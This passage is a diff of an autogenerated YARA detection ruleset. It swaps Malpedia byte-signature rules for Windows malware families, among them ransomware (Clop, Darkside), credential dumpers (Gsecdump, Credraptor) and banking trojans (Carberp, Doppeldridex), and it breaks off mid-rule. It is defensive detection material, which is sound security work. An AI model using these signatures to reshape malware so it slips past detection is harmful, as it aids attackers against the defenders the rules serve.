-		$sequence_3 = { 0101 014514 2bf3 8b5d0c c7472400000000 }
-		$sequence_4 = { 0108 3908 1bc9 f7d9 }
-		$sequence_5 = { e8???????? 33c0 40 5d c20c00 6a08 }
-		$sequence_6 = { 5d c20c00 6a08 68???????? e8???????? 8b450c }
-		$sequence_7 = { 8bc8 85c9 7436 8b413c 03c1 }
-		$sequence_8 = { 0105???????? 8d8d5cffffff 89855cffffff 898560ffffff }
-		$sequence_9 = { 5e e9???????? c3 55 8bec }
-		$sequence_10 = { 0108 894810 8b4830 3308 }
-		$sequence_11 = { 8a10 301401 8a10 301406 40 4f }
-		$sequence_12 = { 2bc8 2bf0 5f 8a10 }
-		$sequence_13 = { 0108 3310 c1c607 c1c210 }
-		$sequence_14 = { 0105???????? 8d558c 89458c 894590 }
-		$sequence_15 = { 33c9 46 2bc3 8944240c 8b5c241c 8d440c2c 0fb61c03 }
-		$sequence_16 = { 017e0c 8d4d08 e8???????? 5f }
-		$sequence_17 = { 01442428 8b442428 884500 45 }
-		$sequence_18 = { 016b08 897b04 5f 5e }
-		$sequence_19 = { 017e0c 395e10 740f ff7610 }
-		$sequence_20 = { 011d???????? 5f 8935???????? 5e }
-		$sequence_21 = { 017e0c 5f 8bc6 5e c20800 }
-		$sequence_22 = { 017e08 50 e8???????? ff0d???????? }
-		$sequence_23 = { 017e08 8bc3 e8???????? c20400 }
+		$sequence_0 = { 8b35???????? 8d4c2414 6a5c 51 }
+		$sequence_1 = { 8d4c2414 6a5c 51 ffd6 83c410 85c0 7411 }
+		$sequence_2 = { 84c0 752f a0???????? 84c0 7409 }
+		$sequence_3 = { c1ea18 33c3 8b1c9530ea0010 33c3 8b1c8d30f60010 33c3 }
+		$sequence_4 = { c3 68b80b0000 ff15???????? e8???????? 8bd8 85db 0f8514010000 }
+		$sequence_5 = { c1e807 33d2 8a9094130110 8bc2 66ff848688090000 8b869c160000 8b96a0160000 }
+		$sequence_6 = { 668b88780a0110 898a8c000000 33c9 668b887c0a0110 898a90000000 33c9 668b887e0a0110 }
+		$sequence_7 = { 5b 81c418010000 c3 56 68???????? 6a00 }
+		$sequence_8 = { 7563 8b4c2410 8d442400 56 50 8d1409 8b4c2414 }
+		$sequence_9 = { b980000000 33c0 8d7c241c 6a1e }
 
 	condition:
-		7 of them and filesize < 835584
+		7 of them and filesize < 180224
 }
-rule MALPEDIA_Win_Cryptoshield_Auto : FILE
+rule MALPEDIA_Win_8T_Dropper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f09fd893-35c5-517a-95b1-96dc5c00c268"
+		id = "35feb768-d2e4-5049-96a0-91c968df3b4f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshield"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cryptoshield_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.8t_dropper_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "41afb8e592a261d954078e9828ef943fd5cdbb4b8df8a3f944658b648d1f2323"
+		logic_hash = "feebe835113f0d32e29c6ca8b7fd1bfa62958e168ff440bb0def00a1fd456e8d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117414,32 +117419,32 @@ rule MALPEDIA_Win_Cryptoshield_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7405 83f804 751a e8???????? }
-		$sequence_1 = { ff15???????? 83c40c 8d85b0edffff 50 683f020f00 }
-		$sequence_2 = { 75cb 66833a00 8bfa 744d 8d4900 }
-		$sequence_3 = { 6a00 8d85e8fbffff 50 6a01 68???????? 56 ff15???????? }
-		$sequence_4 = { 8d85c4f1ffff 68???????? 50 ffd3 }
-		$sequence_5 = { 50 ffd7 8b45f0 85c0 7506 }
-		$sequence_6 = { 0f84a6000000 8d45fc 50 6a01 ff75f8 6810660000 }
-		$sequence_7 = { 6a00 ffd3 85c0 0f84bb000000 6804010000 }
-		$sequence_8 = { ff15???????? c745fc00000000 85f6 7407 56 ff15???????? 85ff }
-		$sequence_9 = { 0fb7c0 50 8d45f4 68???????? 50 ffd6 83c40c }
+		$sequence_0 = { c644240c00 f3ab 66ab aa bf???????? 83c9ff }
+		$sequence_1 = { 8d4c2408 51 683f000f00 50 52 6801000080 }
+		$sequence_2 = { 8bf0 83c408 85f6 741b 56 6800700000 6a01 }
+		$sequence_3 = { c6440c0d75 c6440c0e6e 8d4c2408 51 683f000f00 50 52 }
+		$sequence_4 = { 85c0 7559 8b4c2408 51 ff15???????? 8d942410010000 6804010000 }
+		$sequence_5 = { 8b442418 68???????? 50 ff15???????? 85c0 7559 8b4c2408 }
+		$sequence_6 = { 7559 8b4c2408 51 ff15???????? 8d942410010000 }
+		$sequence_7 = { c6440c0e6e 8d4c2408 51 683f000f00 50 }
+		$sequence_8 = { 51 ff15???????? 8d942410010000 6804010000 }
+		$sequence_9 = { f7d1 49 c6440c0c52 c6440c0d75 c6440c0e6e 8d4c2408 }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 147456
 }
-rule MALPEDIA_Win_Go_Red_Auto : FILE
+rule MALPEDIA_Win_Darkside_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "349c73e1-95b2-5589-863e-7a8d953d6a5e"
+		id = "aefc41a3-b8c0-5b26-a4f2-4bd0717ef6d0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.go_red"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.go_red_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkside"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkside_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "f8574b8fe29715ba2701e58cba52ed611bfc6971c882e6ec12a4906afec7293e"
+		logic_hash = "19da14f3a366acd3b23a4b82b0e78c008b7088d377404cdf8c0d0057a334f0f7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117453,32 +117458,32 @@ rule MALPEDIA_Win_Go_Red_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 84c0 740a 488b7c2470 e9???????? 488b7c2470 488b5748 }
-		$sequence_1 = { eb0a 488b7c2450 e8???????? 488b542470 4c8b442468 4c8b4c2438 488b5228 }
-		$sequence_2 = { e8???????? 488b6d00 488d0526777d00 4889cb 0f1f00 e8???????? 4889442470 }
-		$sequence_3 = { e8???????? 48c7400802000000 48c7401002000000 833d????????00 750d 488b8c24c02f0000 488908 }
-		$sequence_4 = { eb11 4889c7 488b8c24001c0000 90 e8???????? 488d0554889f00 e8???????? }
-		$sequence_5 = { e8???????? 488b942498000000 488bb424b0000000 4989c1 b901000000 41b801000000 488b442458 }
-		$sequence_6 = { e8???????? 4c89d8 e8???????? 4889f8 4c89d9 e8???????? 4c89c0 }
-		$sequence_7 = { eb1c 488d7802 4839f9 7c18 4839c1 0f86a8020000 0fb63c02 }
-		$sequence_8 = { e8???????? 488d05da7f9e00 e8???????? 4889842458060000 48b9211f0000b9030000 488908 488b9c24481a0000 }
-		$sequence_9 = { e8???????? 488d0521e7a701 bb14000000 e8???????? 90 4889442408 895c2410 }
+		$sequence_0 = { 59 5b 5d c20800 55 8bec 53 }
+		$sequence_1 = { 895c0e04 893c0e 81ea10101010 2d10101010 81eb10101010 81ef10101010 }
+		$sequence_2 = { 75d2 5f 5e 5a 59 }
+		$sequence_3 = { 8b4508 8b10 8b5804 8b7808 8b400c 89540e0c 89440e08 }
+		$sequence_4 = { be???????? 8b4508 8b10 8b5804 8b7808 8b400c }
+		$sequence_5 = { b9f0000000 be???????? 8b4508 8b10 }
+		$sequence_6 = { e8???????? 5f 5e 5a 59 5b 5d }
+		$sequence_7 = { 85c0 7418 8bd8 68ff000000 57 }
+		$sequence_8 = { 57 e8???????? 81c7ff000000 4b 85db 75ea }
+		$sequence_9 = { 75da eb06 33db fec1 75d2 5f 5e }
 
 	condition:
-		7 of them and filesize < 85566464
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Credraptor_Auto : FILE
+rule MALPEDIA_Win_Fatduke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "38da88b1-241e-5356-be41-ccd7d9b62617"
+		id = "adb8db95-b0a4-5276-93ef-e2fa83c10075"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.credraptor_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fatduke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fatduke_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "0cde833c9a51e3ab99821592757d4fd144febcb8863fef5eac3bf6a67840a9e9"
+		logic_hash = "e52f36e4d51bd81125ac15c50f357b773a2dec05d6d491e80497ca4c3e0bf041"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117492,32 +117497,32 @@ rule MALPEDIA_Win_Credraptor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4720 83c40c 837e4000 89558c 8945c0 894db8 0f85c9120000 }
-		$sequence_1 = { e8???????? 83c40c e9???????? 837f3000 7415 8b5508 52 }
-		$sequence_2 = { e8???????? 83c404 8b5dfc 5e 8b4d0c 51 8bc3 }
-		$sequence_3 = { e9???????? a802 7508 83c8ff e9???????? 8b45f0 85c0 }
-		$sequence_4 = { c6043b25 03da ddd9 ddd8 8b4d94 41 803900 }
-		$sequence_5 = { c745dc377f0682 c745e0002de218 884de9 8855ea 8845eb 3bc7 750e }
-		$sequence_6 = { c70353000000 b802000000 5b 5d c3 83f83e 7510 }
-		$sequence_7 = { be???????? 8d4ddc 8a01 3a06 751a 84c0 7412 }
-		$sequence_8 = { c1f812 0cf0 0fb6c8 51 8bce e8???????? 8bd3 }
-		$sequence_9 = { e8???????? ff45e4 83c404 83c318 8945f0 85c0 74e0 }
+		$sequence_0 = { e8???????? 83c404 c7451c07000000 c7451800000000 33c0 66894508 c745fcffffffff }
+		$sequence_1 = { e8???????? c745fc00000000 33c0 8b4d08 c706???????? f6c101 7505 }
+		$sequence_2 = { 8b4004 8a540840 8855ee 8b4c0838 8b4120 833800 7423 }
+		$sequence_3 = { c784248800000000000000 c784248c00000000000000 c784248c0000000f000000 c784248800000000000000 c644247800 803a00 7504 }
+		$sequence_4 = { a1???????? 33c4 50 8d442430 64a300000000 8bf1 ff74240c }
+		$sequence_5 = { 8b450c 8901 8bc1 8b4df4 64890d00000000 59 5f }
+		$sequence_6 = { c745e000000000 8d45b4 50 8d45e0 50 6a01 8d45e8 }
+		$sequence_7 = { e9???????? 8b4df0 81c104030000 e9???????? 8b4df0 81c11c030000 e9???????? }
+		$sequence_8 = { c745fc00000000 8b450c 894114 8b4510 894118 8b4514 89411c }
+		$sequence_9 = { 8d45d8 50 8d5508 8d4dc0 e8???????? 83c404 c645fc02 }
 
 	condition:
-		7 of them and filesize < 1728512
+		7 of them and filesize < 9012224
 }
-rule MALPEDIA_Win_Coronavirus_Ransomware_Auto : FILE
+rule MALPEDIA_Win_Doppeldridex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6151d4f1-97cc-5312-ae6b-4a65c017356c"
+		id = "daa7948f-1af7-5dc7-b72c-52142db6eff9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coronavirus_ransomware"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.coronavirus_ransomware_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppeldridex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.doppeldridex_auto.yar#L1-L180"
 		license_url = "N/A"
-		logic_hash = "12ada14137bab3268f52ca487b70dc117c439c16c715b2ea437f3cb7436cd1a9"
+		logic_hash = "c03ed87815d6a97d4f986f8009113427e6594093f0809ec3f0f49a2c2120349d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117531,34 +117536,40 @@ rule MALPEDIA_Win_Coronavirus_Ransomware_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b7dbc 2bfb 1bc6 8945d0 8b4dc8 8d140b }
-		$sequence_1 = { 83c404 85f6 746a 803e00 7465 33c0 33d2 }
-		$sequence_2 = { 8b35???????? 83c404 85f6 746a 803e00 }
-		$sequence_3 = { 90 8b55ec 8b45f0 6a00 b9???????? 81e9???????? }
-		$sequence_4 = { e8???????? 83c404 6a00 6a00 0fb60d???????? 8b148d78954100 52 }
-		$sequence_5 = { 33f6 56 56 6a03 56 6a03 56 }
-		$sequence_6 = { ffd0 6800200000 8d85f8deffff 50 ff15???????? }
-		$sequence_7 = { 85db 0f84cd010000 c745fc01000000 8975e4 }
-		$sequence_8 = { b8???????? e8???????? 8d4df0 51 8d55a0 52 }
-		$sequence_9 = { ff15???????? 8b35???????? 83c418 68???????? ffd6 68???????? ffd6 }
+		$sequence_0 = { 8bf0 33c0 48 8bfe 8bda 2bf8 2bd8 }
+		$sequence_1 = { e8???????? e9???????? 55 83ec68 33d2 42 }
+		$sequence_2 = { 8b74243c 6a30 8b2f 56 8d4c2408 c6450000 e8???????? }
+		$sequence_3 = { 6880000000 ffb4249c010000 ffb424b4010000 ffb42498000000 56 8d4c2428 8d91e0000000 }
+		$sequence_4 = { 33c0 48 2bc8 2bd0 0bca 0f84b1000000 8d9424a4010000 }
+		$sequence_5 = { 8b02 40 8902 83f80a 0f85fefdffff e9???????? c784249000000000000000 }
+		$sequence_6 = { ff742410 50 6a00 52 ff742428 }
+		$sequence_7 = { 2bf8 2bd8 0bfb 0f8443030000 8d942490000000 8b02 }
+		$sequence_8 = { eb2b 31c0 8b4d88 83c104 }
+		$sequence_9 = { 0f92c4 8a6db3 20cd 20e5 f6c501 8955b4 7518 }
+		$sequence_10 = { 8b458c 8944240c 8b55a4 ffd2 83ec10 }
+		$sequence_11 = { 894de4 e8???????? 83f800 8945e0 74c2 }
+		$sequence_12 = { e8???????? 31c0 8945e8 eb51 31c0 }
+		$sequence_13 = { 01de 8b06 8bb550ffffff 8b5e08 8b4da8 01f9 890c24 }
+		$sequence_14 = { 6683ff00 89d3 8945b8 8955d0 8975d4 895ddc }
+		$sequence_15 = { 8b4df0 39c8 8945dc 72d2 ebb6 55 89e5 }
 
 	condition:
-		7 of them and filesize < 235520
+		7 of them and filesize < 360448
 }
-rule MALPEDIA_Win_Gsecdump_Auto : FILE
+rule MALPEDIA_Win_Phorpiex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2dfd4f44-5170-5305-aab8-b4eb041699cc"
+		id = "9ce70e39-752b-5d3f-89f2-76accce1eb4a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gsecdump"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gsecdump_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.phorpiex_auto.yar#L1-L274"
 		license_url = "N/A"
-		logic_hash = "c92dc71f6df6f2ca655d1d4b5083e376ffdf96fc42dec3e3018507005bdeaa61"
+		logic_hash = "46ea47179a9ad601c3537e5e9a3e48103f2b8131777a3f05f545f317a9791487"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -117570,32 +117581,52 @@ rule MALPEDIA_Win_Gsecdump_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 8b742408 85f6 57 8bf9 7505 bef7030000 }
-		$sequence_1 = { e8???????? 6aff 53 8d4c2430 51 8bce e8???????? }
-		$sequence_2 = { 720d 8b542430 52 e8???????? 83c404 8bc6 8b4c2448 }
-		$sequence_3 = { 8bef 83c701 eba4 8b4e24 3bca 740c }
-		$sequence_4 = { 7422 8b4c2440 51 8b4c2428 8d542420 52 51 }
-		$sequence_5 = { 8db424c0000000 89742424 896c2428 8bc2 7307 8d8424c4000000 }
-		$sequence_6 = { 50 895c241c e8???????? 8b4c2464 8b542468 8b44246c 894e44 }
-		$sequence_7 = { 50 8b8de8f7ffff 8b5110 ffd2 81c49c000000 85c0 7d0c }
-		$sequence_8 = { e8???????? 33c0 e9???????? 6a06 68???????? 8d4dd4 c745ec0f000000 }
-		$sequence_9 = { 83f8ff 7409 8b74246c eb03 8d7004 56 8d4c2418 }
+		$sequence_0 = { 6a00 ff15???????? ff15???????? 50 e8???????? }
+		$sequence_1 = { ff15???????? 85c0 740f 6a07 }
+		$sequence_2 = { ff15???????? 85c0 741f 6880000000 }
+		$sequence_3 = { 6a00 6a20 6a00 6a00 6a00 8b5508 }
+		$sequence_4 = { e8???????? 83c410 6a00 6a02 6a02 6a00 }
+		$sequence_5 = { 6a01 6a00 68???????? e8???????? 83c40c 33c0 }
+		$sequence_6 = { e8???????? 99 b90d000000 f7f9 }
+		$sequence_7 = { 50 e8???????? 83c404 e8???????? e8???????? ff15???????? }
+		$sequence_8 = { 68???????? ff15???????? 8d85f8fdffff 50 68???????? }
+		$sequence_9 = { 6a00 ff15???????? 85c0 7418 ff15???????? }
+		$sequence_10 = { 6a01 ff15???????? ff15???????? b001 }
+		$sequence_11 = { 6a00 682a800000 6a00 ff15???????? }
+		$sequence_12 = { 52 683f000f00 6a00 68???????? 6802000080 ff15???????? 85c0 }
+		$sequence_13 = { 7416 8b4df8 51 ff15???????? 8b55fc 52 e8???????? }
+		$sequence_14 = { f7f9 81c210270000 52 e8???????? }
+		$sequence_15 = { 85c0 752b 8b8510ffffff 83c001 }
+		$sequence_16 = { 6a01 ff15???????? 8945f8 837df800 7429 8b45f8 }
+		$sequence_17 = { 68???????? ff15???????? e9???????? 8d45fc }
+		$sequence_18 = { 50 e8???????? 59 59 85c0 7573 }
+		$sequence_19 = { 3d00010000 7504 83c8ff c3 }
+		$sequence_20 = { 7508 6a00 ff15???????? 6804010000 }
+		$sequence_21 = { 6a21 50 e8???????? c60000 }
+		$sequence_22 = { 52 e8???????? 99 b960ea0000 f7f9 }
+		$sequence_23 = { 56 ff15???????? b001 5e 81c408020000 }
+		$sequence_24 = { 68???????? 8d942410010000 6804010000 52 e8???????? }
+		$sequence_25 = { 40 84c9 75f9 8b0cb3 2bc2 50 }
+		$sequence_26 = { 41 663bc2 72f7 53 33c0 }
+		$sequence_27 = { 56 57 68e8030000 ff15???????? e8???????? be???????? }
+		$sequence_28 = { 50 8d45ec 50 6805000020 }
+		$sequence_29 = { 8d45f8 50 8d45e4 50 6805000020 }
 
 	condition:
-		7 of them and filesize < 630784
+		7 of them and filesize < 2490368
 }
-rule MALPEDIA_Win_Voidoor_Auto : FILE
+rule MALPEDIA_Win_Orangeade_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "21b775d6-fc03-5dd6-a228-147ffaddc7f0"
+		id = "a790e493-320f-57de-9b62-d13796c94676"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.voidoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.voidoor_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orangeade"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.orangeade_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "3d15a11c9349ebbd78b8b5ac32c650a51c9ca8251bf91feba17b7b25a2692cb6"
+		logic_hash = "bc9cfd6680cc4f32cd41e9edf43afa43b54975c598906df96ea95e31fa6c1612"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117609,32 +117640,32 @@ rule MALPEDIA_Win_Voidoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 740d 83cb40 eb66 81cb80000000 eb5e 83cb20 eb59 }
-		$sequence_1 = { 83c404 837c241000 7509 55 e8???????? 83c404 5b }
-		$sequence_2 = { c786a805000002000000 5e c3 83f901 74bf 68???????? 50 }
-		$sequence_3 = { c7461807000000 eb36 803f0a 756d 47 83c3ff c7461807000000 }
-		$sequence_4 = { 0f8498000000 83f801 0f848f000000 83f8ff 0f8486000000 f6470c82 7551 }
-		$sequence_5 = { e8???????? 83c404 85c0 0f8547010000 817e782c010000 0f8cdc000000 39850c030000 }
-		$sequence_6 = { ff33 ffd6 ff7304 ffd6 8b4c243c 5f 5e }
-		$sequence_7 = { e9???????? 8d8de8fdffff e9???????? 8d8d48feffff e9???????? 8b8d78fcffff e9???????? }
-		$sequence_8 = { c78424e005000001010101 c78424e405000001010101 66c78424e80500000100 33c9 8bff 8a848c08050000 3422 }
-		$sequence_9 = { e9???????? 57 33ff 8bcf 894de4 8bc7 3998f8f14b00 }
+		$sequence_0 = { 8bb42428050000 50 8bce e8???????? c744241001000000 }
+		$sequence_1 = { 50 8d942470020000 51 52 ff15???????? }
+		$sequence_2 = { f3ab 66ab aa 8d842468020000 50 }
+		$sequence_3 = { 6881000000 6a00 c784249428010000000000 ff15???????? 8bf0 56 }
+		$sequence_4 = { aa b93f000000 33c0 8dbc2465010000 }
+		$sequence_5 = { 8d4c2424 c684248828010002 e8???????? 8d4c2410 c684248828010001 e8???????? 8d4c2414 }
+		$sequence_6 = { b93f000000 33c0 8d7c2479 885c2478 f3ab }
+		$sequence_7 = { 68???????? 8d4c2410 e8???????? 68???????? 6884000000 53 ff15???????? }
+		$sequence_8 = { e8???????? 83c404 8d4c2424 c684248828010002 }
+		$sequence_9 = { 50 8d4c2410 c684248400000001 e8???????? }
 
 	condition:
-		7 of them and filesize < 1744896
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Mistpen_Auto : FILE
+rule MALPEDIA_Win_Carberp_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "da7a11f3-113a-5db0-8b14-11346c846c77"
+		id = "a6dabcbc-eb1a-5db4-81e2-886d378b4be1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mistpen"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mistpen_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.carberp_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "70ffa3f473a1017022fe8085a2fe1094ee2434500473a4c1dd94bcb7c2db0a7a"
+		logic_hash = "86e4e7a3a500c58000a297ef120e6eaa02ce211014fb7c016ba6df2b3118cc01"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117648,32 +117679,32 @@ rule MALPEDIA_Win_Mistpen_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7602 ffc0 4585c0 8bf0 }
-		$sequence_1 = { 420fb6842090960200 4433d8 45335ffc 4533da 458bd3 45895e20 4533d0 }
-		$sequence_2 = { 4533848460850200 410fb6c3 4533848460750200 400fb6c7 4533848490920200 4533465c 418bc0 }
-		$sequence_3 = { 4403c1 418bcb 410bca 458bc8 23cf 41c1c91b }
-		$sequence_4 = { 4c8d0d74d70000 b919000000 4c8d0564d70000 488d1561d70000 e8???????? 4885c0 7420 }
-		$sequence_5 = { c1e31e 8bcf 410bcd 8bc7 4123cf 4123c5 0bc8 }
-		$sequence_6 = { 458b8c9460810200 4133bc8490920200 418bc0 41337e20 c1e808 0fb6c8 8bc3 }
-		$sequence_7 = { 83f838 7cec 8b4c2458 8bc1 c1e818 884594 8bc1 }
-		$sequence_8 = { 488d45e8 48894de8 488945f0 488d1590d10000 b805000000 894520 }
-		$sequence_9 = { 7e1d 488b5588 4c8d4c2450 458bc4 498bce }
+		$sequence_0 = { ff750c 33db ff35???????? e8???????? 8bf0 59 59 }
+		$sequence_1 = { 7416 80f92f 7411 80f93d 740c 3bc6 7e04 }
+		$sequence_2 = { 7415 3bcb 7611 83fa1f 730c 884415d4 42 }
+		$sequence_3 = { 8d0409 83f80a 89442410 7e08 c74424100a000000 3b6c243c 0f8cf5fdffff }
+		$sequence_4 = { ff7514 e8???????? 8bf0 59 85f6 7416 ff7514 }
+		$sequence_5 = { 68???????? 50 68???????? 6a03 e8???????? 83c410 8906 }
+		$sequence_6 = { e8???????? 59 5e c3 6a00 56 e8???????? }
+		$sequence_7 = { ff731c 6a09 680b110000 ff35???????? e8???????? 83c410 85c0 }
+		$sequence_8 = { ff742410 ff742410 ff742410 ff742410 ffd0 c3 56 }
+		$sequence_9 = { 817e0402020000 0f85c1000000 6af4 ff36 e8???????? 59 59 }
 
 	condition:
-		7 of them and filesize < 458752
+		7 of them and filesize < 491520
 }
-rule MALPEDIA_Win_Clop_Auto : FILE
+rule MALPEDIA_Win_Rctrl_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4854a8b5-e52e-5b4e-a6a6-3c1168d9d798"
+		id = "521dcb03-760d-5ed1-9bc0-cfe33a8e8406"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.clop"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.clop_auto.yar#L1-L181"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rctrl"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rctrl_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "65d38e339958842c1ae82c8f06911cc6fa67bb1b5d7a3308dc697dc71c286d31"
+		logic_hash = "3aa1e790ecad0aeaad15ec64d74fdf04a1c9b1767736a5ae9f383b695d1cefd0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117687,39 +117718,32 @@ rule MALPEDIA_Win_Clop_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a04 6800300000 6887000000 6a00 }
-		$sequence_1 = { 83c40c 6860070000 6a40 ff15???????? }
-		$sequence_2 = { 57 6a00 ff15???????? 68???????? 8bd8 }
-		$sequence_3 = { ff15???????? 8bf0 56 53 ff15???????? 50 ff15???????? }
-		$sequence_4 = { 50 ff15???????? 56 53 8bf8 }
-		$sequence_5 = { 53 8bf8 ff15???????? 8bf0 56 6a40 }
-		$sequence_6 = { 668b0424 6683e07f 6683f87f 8d642408 0f85fd0b0000 eb00 f30f7e442404 }
-		$sequence_7 = { 50 ff15???????? 83c40c 6860070000 }
-		$sequence_8 = { 03d1 0fb6ca 8b55fc 0fb60c01 300c17 47 8a550b }
-		$sequence_9 = { 8ab800010000 8a9001010000 57 33ff 8975f8 85f6 744e }
-		$sequence_10 = { 744e fec7 0fb6f7 8a1c06 02d3 88550b 0fb6d2 }
-		$sequence_11 = { 47 8a550b 3b7df8 72c7 5f 8aca 88b800010000 }
-		$sequence_12 = { ffd0 c3 8bff 55 8bec 83ec1c 8d4de4 }
-		$sequence_13 = { 8d85bcefffff 50 ff15???????? 68???????? }
-		$sequence_14 = { 68???????? 68???????? e8???????? 83c424 6aff }
-		$sequence_15 = { ff15???????? 68???????? 8d85dcf7ffff 50 }
-		$sequence_16 = { 6a00 e8???????? 83c408 6aff ff15???????? 33c0 }
+		$sequence_0 = { 41 0024bf 41 00558b ec 81ec90000000 a1???????? }
+		$sequence_1 = { e8???????? c3 83795c00 7405 }
+		$sequence_2 = { 7507 32db e9???????? 6890010000 8d8564fcffff 6a00 50 }
+		$sequence_3 = { e8???????? cc 55 8bec 837d0c00 57 8bf9 }
+		$sequence_4 = { 8b02 3b07 7536 52 e8???????? 83ceff 8985c8fbffff }
